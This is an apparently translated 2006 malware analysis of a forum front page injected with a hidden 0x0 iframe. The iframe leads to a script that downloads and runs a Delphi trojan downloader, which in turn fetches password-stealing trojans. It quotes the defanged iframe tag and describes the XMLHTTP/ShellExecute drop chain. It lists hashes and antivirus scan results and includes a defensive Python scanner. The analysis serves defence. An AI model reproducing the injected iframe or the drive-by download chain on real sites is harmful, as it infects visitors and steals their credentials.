A forum had code injected that downloads Trojan-Downloader.Win32.Delf.ajm


Original by endurer
2006-12-15, revision 1

Code injected into the forum front page:
/--------
<iframe src=hxxp://www.z*z***yqr.com.**/lpf/wm.htm width=0 height=0 frameborder=0></iframe>
--------/


The content of wm.htm is a JavaScript script. It uses Microsoft.XMLHTTP and Scripting.FileSystemObject to download the file /mc/game/lpf.exe, saves it as c:/boot.exe, and then runs it through the ShellExecute method of the Shell.Application object.
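As an added example (not code from the original post), here is a small Python scanner a forum administrator could run over page source to flag the two indicators described above: a 0x0 hidden iframe, and a script that names the XMLHTTP / FileSystemObject / Shell.Application chain. The sample inputs are constructed; the wm.htm stand-in contains only the object names, not a working script.

```python
from html.parser import HTMLParser

# The injected tag was a 0x0, borderless frame; width/height 0 is the
# attribute pair we key on (frameborder=0 merely hides the edge).
HIDDEN_IFRAME_ATTRS = {"width": "0", "height": "0"}

# COM objects and method the wm.htm script chains together:
# download (XMLHTTP), write to disk (FileSystemObject), run (Shell.Application.ShellExecute).
DROPPER_MARKERS = ("Microsoft.XMLHTTP", "Scripting.FileSystemObject",
                   "Shell.Application", "ShellExecute")


class HiddenIframeFinder(HTMLParser):
    """Collects src values of iframes sized 0x0 (handles unquoted attributes)."""

    def __init__(self):
        super().__init__()
        self.hits = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "iframe":
            return
        a = {k.lower(): (v or "").strip() for k, v in attrs}
        if all(a.get(k) == v for k, v in HIDDEN_IFRAME_ATTRS.items()):
            self.hits.append(a.get("src", ""))


def hidden_iframes(html):
    parser = HiddenIframeFinder()
    parser.feed(html)
    parser.close()
    return parser.hits


def dropper_markers(text):
    """Return the markers present; three or more together is a strong dropper signal."""
    low = text.lower()
    return [m for m in DROPPER_MARKERS if m.lower() in low]


def scan_page(html):
    findings = [("hidden-iframe", src) for src in hidden_iframes(html)]
    hits = dropper_markers(html)
    if len(hits) >= 3:
        findings.append(("activex-dropper", "+".join(hits)))
    return findings


# Constructed samples: the defanged iframe quoted in the post, and a non-functional
# stub that only names the objects wm.htm used (hypothetical, for testing the scanner).
FORUM_SNIPPET = ('<html><body>post text<iframe src=hxxp://www.z*z***yqr.com.**/lpf/wm.htm '
                 'width=0 height=0 frameborder=0></iframe></body></html>')
WM_STUB = ('<script>/* stub: object names only */ "Microsoft.XMLHTTP"; '
           '"Scripting.FileSystemObject"; "Shell.Application"; "ShellExecute"</script>')

if __name__ == "__main__":
    for kind, detail in scan_page(FORUM_SNIPPET) + scan_page(WM_STUB):
        print(kind, detail)
```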

lpf.exe was built with Borland Delphi Setup Module
/-------
File : D:/virus/lpf.exe
Attributes : A---
Failed to get file version info size!
Created : 2006-12-15 20:52:52
Modified : 2006-12-15 20:52:54
Accessed : 2006-12-15 0:0:0
Size : 15872 bytes 15.512 KB
MD5 : 1914ec3e09f9bca86a10034ff9b3b985
-------/
Kaspersky reports it as Trojan-Downloader.Win32.Delf.ajm; Rising reports it as Trojan.DL.Multi.wen

STATUS: FINISHED

Complete scanning result of "lpf.exe", received in VirusTotal at 12.15.2006, 14:28:30 (CET).

Antivirus Version Update Result
AntiVir 7.3.0.15 12.15.2006 TR/Delphi.Downloader.Gen
Authentium 4.93.8 12.14.2006 Possibly a new variant of W32/SecRisk-ProcessPatcher-Sml-based!Maximus
Avast 4.7.892.0 12.15.2006 no virus found
AVG 386 12.15.2006 no virus found
BitDefender 7.2 12.15.2006 BehavesLike:Win32.ExplorerHijack
CAT-QuickHeal 8.00 12.14.2006 TrojanDownloader.Delf.ajm
ClamAV devel-20060426 12.15.2006 Trojan.Downloader-51
DrWeb 4.33 12.15.2006 Trojan.DownLoader.14624
eSafe 7.0.14.0 12.14.2006 no virus found
eTrust-InoculateIT 23.73.86 12.15.2006 no virus found
eTrust-Vet 30.3.3252 12.15.2006 no virus found
Ewido 4.0 12.15.2006 Downloader.Delf.ajm
Fortinet 2.82.0.0 12.15.2006 no virus found
F-Prot 3.16f 12.14.2006 Possibly a new variant of W32/SecRisk-ProcessPatcher-Sml-based!Maximus
F-Prot4 4.2.1.29 12.14.2006 W32/SecRisk-ProcessPatcher-Sml-based!Maximus
Ikarus T3.1.0.26 12.15.2006 no virus found
Kaspersky 4.0.2.24 12.15.2006 Trojan-Downloader.Win32.Delf.ajm
McAfee 4919 12.14.2006 Generic Delphi
Microsoft 1.1804 12.15.2006 no virus found
NOD32v2 1923 12.15.2006 probably a variant of Win32/TrojanDownloader.Delf.NDQ
Norman 5.80.02 12.15.2006 W32/Delf.TWZ
Panda 9.0.0.4 12.15.2006 Suspicious file
Prevx1 V2 12.15.2006 no virus found
Sophos 4.12.0 12.14.2006 no virus found
Sunbelt 2.2.907.0 11.30.2006 no virus found
TheHacker 6.0.3.132 12.14.2006 no virus found
UNA 1.83 12.14.2006 no virus found
VBA32 3.11.1 12.14.2006 no virus found
VirusBuster 4.3.19:9 12.14.2006 no virus found

Aditional Information
File size: 15872 bytes
MD5: 1914ec3e09f9bca86a10034ff9b3b985
SHA1: ad95735b4cb4ed24767801f3b3bde4823cd24281

lpf.exe downloads the following files:
1) /mc/bao/lipengfei.exe

Packed with UPX 0.89.6 - 1.02 / 1.05 - 1.24 -> Markus & Laszlo
/-------
File : D:/virus/lipengfei.exe
Attributes : A---
Failed to get file version info size!
Created : 2006-12-15 21:2:56
Modified : 2006-12-15 21:2:58
Accessed : 2006-12-15 0:0:0
Size : 39069 bytes 38.157 KB
MD5 : 8a91fe8298abe6d136e6e4a2071abb1e
-------/
Rising reports it as: Trojan.PSW.QQPass.qxf

Complete scanning result of "lipengfei.exe", received in VirusTotal at 12.15.2006, 14:39:16 (CET).

Antivirus Version Update Result
AntiVir 7.3.0.15 12.15.2006 DR/Delphi.Gen
Authentium 4.93.8 12.14.2006 no virus found
Avast 4.7.892.0 12.15.2006 Win32:QQPass-EU
AVG 386 12.15.2006 PSW.Generic2.SUE
BitDefender 7.2 12.15.2006 Generic.PWStealer.A771A4B9
CAT-QuickHeal 8.00 12.14.2006 no virus found
ClamAV devel-20060426 12.15.2006 no virus found
DrWeb 4.33 12.15.2006 Trojan.PWS.Qqpass.326
eSafe 7.0.14.0 12.14.2006 suspicious Trojan/Worm
eTrust-InoculateIT 23.73.86 12.15.2006 Win32/QQPass.Variant!Trojan
eTrust-Vet 30.3.3252 12.15.2006 no virus found
Ewido 4.0 12.15.2006 Trojan.QQPass.ra
Fortinet 2.82.0.0 12.15.2006 no virus found
F-Prot 3.16f 12.14.2006 no virus found
F-Prot4 4.2.1.29 12.14.2006 no virus found
Ikarus T3.1.0.26 12.15.2006 Trojan-PSW.Win32.Delf.IC
Kaspersky 4.0.2.24 12.15.2006 Trojan-PSW.Win32.QQPass.ra
McAfee 4919 12.14.2006 PWS-Hook.dll
Microsoft 1.1804 12.15.2006 no virus found
NOD32v2 1923 12.15.2006 probably a variant of Win32/PSW.QQShou.EP
Norman 5.80.02 12.15.2006 W32/QQPass.CHM
Panda 9.0.0.4 12.15.2006 Suspicious file
Prevx1 V2 12.15.2006 no virus found
Sophos 4.12.0 12.14.2006 no virus found
Sunbelt 2.2.907.0 11.30.2006 no virus found
TheHacker 6.0.3.132 12.14.2006 Trojan/PSW.QQPass.ra
UNA 1.83 12.14.2006 Trojan.PSW.Win32.QQPass.6EDE
VBA32 3.11.1 12.14.2006 BackDoor.Pigeon.516
VirusBuster 4.3.19:9 12.14.2006 no virus found

Aditional Information

File size: 39069 bytes
MD5: 8a91fe8298abe6d136e6e4a2071abb1e
SHA1: 6909040f888c037999d64a32f5ef90521602ab93
packers: UPX

2) /mc/pqpq.exe
Packed with nSPack 1.3 -> North Star/Liu Xing Ping
/-------
File : D:/pe/virus/pqpq.exe
Attributes : A---
Language : Chinese (China)
File version : 0.00.0195
Description :
Copyright :
Comments :
Product version : 0.00.0195
Product name : Xcd
Company name : Xcd
Legal trademarks :
Internal name : 23oigj
Original filename : 23oigj.exe
Created : 2006-12-15 21:3:12
Modified : 2006-12-15 21:3:14
Accessed : 2006-12-15 0:0:0
Size : 44151 bytes 43.119 KB
MD5 : 04433d91f101e7c95d5d77c1cbe1efd6
-------/
Rising reports it as: Trojan.PSW.Misc.kif

Complete scanning result of "pqpq.exe", received in VirusTotal at 12.15.2006, 14:47:23 (CET).

Antivirus Version Update Result
AntiVir 7.3.0.15 12.15.2006 TR/PSW.Lmir.44151
Authentium 4.93.8 12.14.2006 Possibly a new variant of W32/Suspicious:VisualBasicMalware!Maximus
Avast 4.7.892.0 12.15.2006 no virus found
AVG 386 12.15.2006 no virus found
BitDefender 7.2 12.15.2006 Generic.PWSLmir.D80E5DAD
CAT-QuickHeal 8.00 12.14.2006 (Suspicious) - DNAScan
ClamAV devel-20060426 12.15.2006 no virus found
DrWeb 4.33 12.15.2006 BackDoor.Generic.1482
eSafe 7.0.14.0 12.14.2006 suspicious Trojan/Worm
eTrust-InoculateIT 23.73.86 12.15.2006 no virus found
eTrust-Vet 30.3.3252 12.15.2006 no virus found
Ewido 4.0 12.15.2006 no virus found
Fortinet 2.82.0.0 12.15.2006 Spy/WOWSTEAL
F-Prot 3.16f 12.14.2006 Possibly a new variant of W32/Suspicious:VisualBasicMalware!Maximus
F-Prot4 4.2.1.29 12.14.2006 W32/Suspicious:VisualBasicMalware!Maximus
Ikarus T3.1.0.26 12.15.2006 Backdoor.Win32.PcClient.GV
Kaspersky 4.0.2.24 12.15.2006 no virus found
McAfee 4919 12.14.2006 no virus found
Microsoft 1.1804 12.15.2006 PWS:Win32/Wowsteal.gen!A
NOD32v2 1923 12.15.2006 a variant of Win32/PSW.Legendmir
Norman 5.80.02 12.15.2006 no virus found
Panda 9.0.0.4 12.15.2006 Suspicious file
Prevx1 V2 12.15.2006 Trojan.SystemPoser
Sophos 4.12.0 12.14.2006 Mal/PWS-D
Sunbelt 2.2.907.0 11.30.2006 VIPRE.Suspicious
TheHacker 6.0.3.132 12.14.2006 no virus found
UNA 1.83 12.14.2006 no virus found
VBA32 3.11.1 12.14.2006 BackDoor.Generic.1482
VirusBuster 4.3.19:9 12.14.2006 novirus:Packed/NSPack

Aditional Information

File size: 44151 bytes
MD5: 04433d91f101e7c95d5d77c1cbe1efd6
SHA1: 26478a8cb49411d3e87132cdad2c82993bf545f2
packers: NSPACK
packers: Packed
Prevx info: http://fileinfo.prevx.com/fileinfo.asp?PXC=cc5f62172717
Sunbelt info: VIPRE.Suspicious is a generic detection for potential threats that are deemed suspicious through heuristics.

3) /mc/gezi.exe could not be retrieved
4) /mc/dabao.exe could not be retrieved
5) /mc/xbao.exe could not be retrieved

They are saved under C:/Program Files/Common Files as:
1.exe
2.exe
3.exe
4.exe
5.exe

This is very similar to what was found previously, but the MD5s of the files differ.
